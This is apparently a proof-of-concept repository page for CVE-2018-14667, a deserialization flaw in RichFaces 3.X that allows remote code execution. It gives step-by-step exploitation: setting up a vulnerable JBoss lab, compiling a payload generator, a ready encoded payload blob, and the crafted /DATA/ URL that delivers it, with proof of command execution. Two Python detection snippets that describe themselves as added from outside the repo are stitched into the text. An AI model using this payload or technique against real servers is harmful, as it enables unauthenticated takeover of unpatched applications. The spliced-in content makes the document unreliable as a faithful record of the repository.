
CVE-2018-14667 PoC — RichFaces Framework Code Injection Vulnerability

Source
Associated Vulnerability
Title: RichFaces Framework Code Injection Vulnerability (CVE-2018-14667)
Description: RichFaces Framework is an open-source JSF component framework. RichFaces Framework versions 3.X through 3.3.4 contain a security vulnerability. A remote attacker can exploit it to execute arbitrary code.
Description
All about CVE-2018-14667; From what it is to how to successfully exploit it.
Readme
# CVE-2018-14667

After spending a lot of time understanding and correctly exploiting this CVE, I decided to build a repo on the RichFaces 3.X RCE bug and share the HOWTOs step by step with the community.

**0x00 : Introduction to the RichFaces 3.X bug**
<p align="left">
  <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/RichFaces.jpg" width="350" title="hover text">
</p>

On Monday, November 19, *Joao F M Figueiredo* published a well-detailed article (https://seclists.org/fulldisclosure/2018/Nov/47) on a critical, high-risk RichFaces vulnerability.  
**CVSS3 Base Score: 9.8**

This vulnerability allows any unauthenticated user to perform remote code execution on any web application using RichFaces 3.X (all versions), which is pretty much the worst-case scenario.

**0x01 : Am I affected?**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/screaming.jpg" width="20"/>

Well, if you are running RichFaces 3.X (any version of RichFaces 3) and you see the following classes in your source, chances are that yes, you might be vulnerable to remote code execution via CVE-2018-14667:

* org.ajax4jsf.resource.InternetResource  
* org.ajax4jsf.resource.SerializableResource  
* javax.el.Expression  
* javax.faces.el.MethodBinding  
* javax.faces.component.StateHolderSaver  
* java.awt.Color  
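As an added example (not code from this repo or from RichFaces), a small Python scanner that walks a deployed EAR/WAR and every nested JAR looking for the ajax4jsf resource classes listed above, so a deployment can be checked without unpacking it by hand. The archives it runs on are constructed inline; the jar name `richfaces-impl-3.3.4.Final.jar` is a sample, not a claim about a real deployment.

```python
import io
import re
import zipfile

# Indicator classes from the list above that ship in the RichFaces/ajax4jsf jars;
# the javax.* and java.awt ones come from the JSF runtime and the JDK, so their
# presence alone says nothing about whether RichFaces 3.X is deployed.
INDICATOR_CLASSES = ("org.ajax4jsf.resource.InternetResource",
                     "org.ajax4jsf.resource.SerializableResource")
CLASS_FILES = {c.replace(".", "/") + ".class": c for c in INDICATOR_CLASSES}
NESTED = (".ear", ".war", ".jar")
RICHFACES_3_JAR = re.compile(r"richfaces-[a-z]+-3\.[\w.]+\.jar$")


def scan_archive(data: bytes, path: str) -> dict:
    """Walk an EAR/WAR/JAR (all plain ZIPs) recursively and return
    {indicator class -> [archive paths in which its .class file was found]}."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(NESTED):  # descend into nested archive
                nested = scan_archive(zf.read(info), f"{path}!/{info.filename}")
                for cls, where in nested.items():
                    hits.setdefault(cls, []).extend(where)
            elif info.filename in CLASS_FILES:
                hits.setdefault(CLASS_FILES[info.filename], []).append(path)
    return hits


def richfaces3_jars(hits: dict) -> set:
    """Basenames of RichFaces 3.x jars that carried an indicator class."""
    return {p.rsplit("/", 1)[-1] for where in hits.values() for p in where
            if RICHFACES_3_JAR.search(p)}


def _zip(entries: dict) -> bytes:
    """Build an in-memory ZIP (the container format EAR, WAR and JAR all use)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample (not a real deployment): an EAR holding a WAR that bundles a
# RichFaces 3.3.4 jar; class files are empty placeholders, only their paths matter.
VULN_JAR = _zip({"org/ajax4jsf/resource/InternetResource.class": b""})
VULN_EAR = _zip({"photoalbum.war": _zip({"WEB-INF/lib/richfaces-impl-3.3.4.Final.jar": VULN_JAR})})
CLEAN_EAR = _zip({"app.war": _zip({"WEB-INF/lib/commons-io.jar": _zip({"org/x/Y.class": b""})})})
```

Point `scan_archive` at the bytes of a real `.ear` or `.war` from the deploy directory; a non-empty result names the archive paths that carry the resource classes.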

**0x02 : Running a vulnerable environment to test the bug**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/bug.jpg" width="20"/>

I will basically re-explain what has already been covered in the seclists.org article on how to deploy a vulnerable environment.  
1. Download JBoss 5.1.0.GA and the RichFaces examples archive, which contains the PhotoAlbum application.    
→ http://downloads.jboss.org/richfaces/releases/3.3.X/3.3.4.Final/richfaces-examples-3.3.4.Final.zip  
→ https://sourceforge.net/projects/jboss/files/JBoss/JBoss-5.1.0.GA/
2. Unzip the ZIP archive.  
3. Copy the application *richfaces-examples-3.3.4.Final/photoalbum/dist/photoalbum-ear-3.3.4.Final.ear* to the JBoss deploy directory *jboss-5.1.0.GA/server/default/deploy/*  
4. Start the JBoss application server with the following command (make sure before launching that port 8080 is not already in use): `cd bin ; ./run.sh -b 0.0.0.0`  
5. You'll need to browse to the PhotoAlbum index page in order to activate the web application.  

**0x03 : Generating a valid payload**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/smirk.jpg" width="20"/>

Now the fun part! This is where I experienced difficulties, so I will explain in detail how to generate a valid payload without repeating the same errors I did. I would suggest using Eclipse to compile the payload.  
1. Download Eclipse from the following link:  
→ https://www.eclipse.org/downloads/  
2. Launch Eclipse and choose to create a new Web Project.  
3. Get the payload generator (credit goes to *orich1* from https://xz.aliyun.com/t/3264) available in this repo  
→ https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/Main.java  
4. Extract the WAR archive in this repo (richfaces-demo-3.3.0.GA-tomcat6.war) and copy all .jar files from its WEB-INF/lib/ folder to WebContent/WEB-INF/lib/ in your Java Web Project in Eclipse  
→ https://github.com/syriusbughunt/CVE-2018-14667/blob/master/richfaces-demo-3.3.0.GA-tomcat6.war  
5. Add the *Main.java* file in Eclipse: right-click on your Java Web Project name in Eclipse, then New, File.  
6. Make the WebContent/WEB-INF/lib folder a Build Path source folder in Eclipse: right-click on the lib folder, Build Path, Use as Source Folder.  
7. Let's see if you get lucky: click on the green Play button to run the compiler. If you get 0 errors and a valid payload in your output, congratulations, you now have a valid payload for CVE-2018-14667. If instead you get all kinds of errors, don't panic. You might want to comment out lines 29 to 35 so they look like this:  
```
        // Class clazz = Class.forName("javax.el.MethodExpression");
        // Field field = clazz.getField("serialVersionUID");
        // field.setAccessible(true);
        // Field modifiersField = Field.class.getDeclaredField("modifiers");
        // modifiersField.setAccessible(true);
        // modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        // field.setLong(null, MethodExpressionSerialVersionUID);
```

Your output result in Eclipse should look like the following:
```
/DATA/eAHNVU1rE0EYnkarbf2qtqhVhLiKTUVmW6mHWgOFKiqkFpq2fvQgk82bZOJ-dWY2WSwVRUSwIkjxpiJ4bS!6B!ToJ9Jf4EEREUEE8SbOzKaJDeqhp-xpZvfZ533med59d-ErauYMHfRYHpMiCfuLPIcZcC9gFuAJDmysstk!wehxIghSV8eRLzG0NoU2WQyIgGHPFeAKgbaliqRETJu4eXM0UwRLDKbQegh9Kjmn0RXUlEItjpelOQrZyr65ROwA9Cb0pZYDiiLEOWIBx5bn-J4ruXFayEKnPDsLLE1KwM6!fJqcv!9mJIZiKdRq2YTzM8SBlRrSglE3LzW0cflOVnMItD1SST0zDYwSm14mGRsGQ1-V75YlMQ9cLcAGwTHYeJzkR0AUvOyJ0Jcn4dRztQ8INW1EKGSoKxItofW4J-bLuQ8!--!ENK6jiqsxPb5xK!39wtIxhVAKBlQYjFqFyIKAYuL7NrWIkGUjH-qLnGUSAgwn7l07ujD2UXvSmSEcohBqtQTapQ8fmmCbk8r42jNp0zqfMB3k7hqqvtZgqLJqkULjSmgx43HtUR3bace3BxZn287Ni-7Io53Vs9dBy21Xp94!-3VXGaC4W8uP0PV9MwymA-AC50EMq3gTPdVlyiOyD-QNWy6ih4Zix6rz8FjgCuqAofGR!IQhWWr3qVvyLkHCDWy7B0MIVsIQXmAV4qZwfJOoy-iZ!U-qvh9KA!auMKDeKOVA5tuOHxuebx1RDmjbyjcb42goYKhjSqccmVb5VBaXJj993jNzUjej7PGYQJ3aWerh0UD4gZBAII5A7TXDoy6TnpSX0Duz2rqmA1lKordMCIn0A7hZ9CGf1mscFoRjx4d6D!XGh!r6Dvf1J40VAyXZAE1ghHpwrdGj6R-zoa6f!xwNKvR2zbCl!ADNNcCB4hCNY7RZBxgIamM52EHF9xa9Xl18BTleL-YCN2lU2BsrOpVCVyWFh-h2I6Sw!Bf8Wwyv0IvVxVAMuEgay9SNkYFALao7xuUo!w0w9PXD.jsf
```

**0x04 : Sending your payload and getting Remote Code Execution**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/bomb.jpg" width="20"/>

Navigate in your browser to your local JBoss server running the PhotoAlbum web application (http://192.168.100.2:8080/photoalbum) and right-click to view the page source. Hit Ctrl+F and search for '/DATA/'. You should find something similar to this:
```
src="/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/eAF1Uk1rFEEQrQwGEz9AXVFyCMQoCiI9JCZeYkBQ0cCsQccI6ql2pna2h57ptrtndzDozYuCF6!evOpFf4HXgJf8BkFEBBHEq929QUnAvlXx6r1Xr!rtd5g0Gs5LXTAssV0qTZ9pMrLRGbENQ!rOTnFmQ!NraBH86yx!i2BfAoczTWjpqqwt1dbCsaTEIcYC6yJe75WU2ZUE9lOruON8BE9hIoGpSua8zynfqSeHKBoKRaucl7OeomV9zMiwTFZK1o6bpdYJ3ZQiJ53ikPT9rQ-rr15!6kYQJTCdCTTmFla020NqNa8L5-GAcTN54LBwYuySyzglzVHwx9gTtNIqL3!OSTLT1MGAIGsYCXYXiy7Zgcyvt8ptYrisQw4AE4cAWg0zY9MOuhf3Pt568fn30sso4Dp!cf-Y3jx7nv58sH3ZI7yDU!4YZU-aIL2Xb61Sovfj5K-DH492vbYPbmo0CzOnN3mFBSUSXURMIa!tmm88AWg0dB6GpZk!jcsyxPJu-96Xr7ObN4Kw2yeycNz7Y1yy9caqxjogYWXhSGiH2fFZlWpHKdyOeZ2JJicTB-3YCO6KgRyxdmArMXfl4sKFhcVLc7u-yer8f63OuxuoP9Xj4!8_" style="opacity: 0.1" class="main-image"><span class="rich-tool-tip tooltip" 
```
You can clearly see the serialized object. This is where we replace the serialized object with our payload to get remote code execution. In your browser, change the URL to http://192.168.100.2:8080/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/YOUR-PAYLOAD-GENERATED-IN-ECLIPSE. My payload executed the command 'touch /tmp/PoorRichFaces'. Let's see if it succeeded:
```
drwxrwxrwt 12 root   root    32768 Nov 30 01:45 .
drwxr-xr-x 25 root   root     4096 Nov 25 12:57 ..
-rw-rw-r--  1 syrius syrius      0 Nov 30 1:27 PoorRichFaces 
```
Feels good, doesn't it? We just got RCE on a Java web application running RichFaces 3.X.  
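From the defender's side, the URL shape shown in this section is what an access-log rule has to recognise. The following is an added example, not code from this repo: it parses the request line of an Apache/Tomcat combined log entry, picks apart the `a4j/s/<version><resource class>/n/n/DATA/<blob>` path, and reports every request that hands a /DATA/ object to `UserResource`. The log lines are constructed; the second one's DATA segment is shortened from the blob in the page source above.

```python
import re

# Shape of the resource URL shown above: /<ctx>/a4j/s/<version><class>/n/n/DATA/<blob>
# The version ("3_3_3.Final") is glued directly onto the class name, hence the lazy group.
A4J_RESOURCE = re.compile(
    r"/a4j/s/(?P<version>[^/]*?)(?P<cls>org\.ajax4jsf\.resource\.\w+)"
    r"/(?P<flags>[^/]+/[^/]+)/DATA/(?P<data>[^\s?\"]+)"
)
# Resource classes whose /DATA/ segment is a serialized object restored on the server
STATEFUL_RESOURCES = {"org.ajax4jsf.resource.UserResource"}
# Request part of an Apache/Tomcat combined access log line
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def inspect_request(log_line: str):
    """Return a finding for a request that hands a serialized /DATA/ object to a
    stateful a4j resource, or None for any other request."""
    req = REQUEST_LINE.search(log_line)
    if not req:
        return None
    m = A4J_RESOURCE.search(req.group("path"))
    if not m or m.group("cls") not in STATEFUL_RESOURCES:
        return None
    return {"resource": m.group("cls"), "version": m.group("version"),
            "data_len": len(m.group("data")), "status": int(req.group("status"))}


def findings(lines):
    """All findings over an iterable of access log lines."""
    return [f for f in map(inspect_request, lines) if f]


# Constructed sample log lines; the DATA segment of the second one is shortened
# from the blob the page source above shows.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Nov/2018:01:27:00 +0000] "GET /photoalbum/img/logo.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [30/Nov/2018:01:27:03 +0000] "GET /photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/eAF1Uk1rFEEQrQwGEz9AXVFyCMQoCiI9JCZeYkBQ0cCsQccI6ql2pma2h57ptrtndzDozYuCF6!evOpFf4HXgJf8BkFEBBHEq929QUnAvlXx6r1Xr!rtd5g HTTP/1.1" 200 4096',
]
```

Because the application itself issues UserResource /DATA/ URLs (the page source above shows one), treat each finding as a triage candidate and compare the blob against the ones the application emits rather than acting on a single hit.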

**0x05 : How to patch?**&nbsp; <img src="https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/img/patch.jpg" width="20"/>
 
You might not like this fact, so be ready and hang on to your keyboard: RichFaces has reached end of life and the product is no longer supported, so users (you) have to apply their own patch. Don't panic; if you can't find a way to patch, don't hesitate to contact me and we can make an arrangement so I can patch your Java web applications.  

E-mail: syriusbughunt@protonmail.com
File Snapshot

```
[4.0K] /data/pocs/c722c8ef0e71d4ccd5074894094eaf8d72622a98
├── [4.0K] img
│   ├── [ 28K] bomb.jpg
│   ├── [ 29K] bug.jpg
│   ├── [ 16K] patch.jpg
│   ├── [ 26K] RichFaces.jpg
│   ├── [ 20K] screaming.jpg
│   └── [ 22K] smirk.jpg
├── [5.1K] Main.java
├── [7.8K] README.md
└── [ 15M] richfaces-demo-3.3.0.GA-tomcat6.war

1 directory, 9 files
```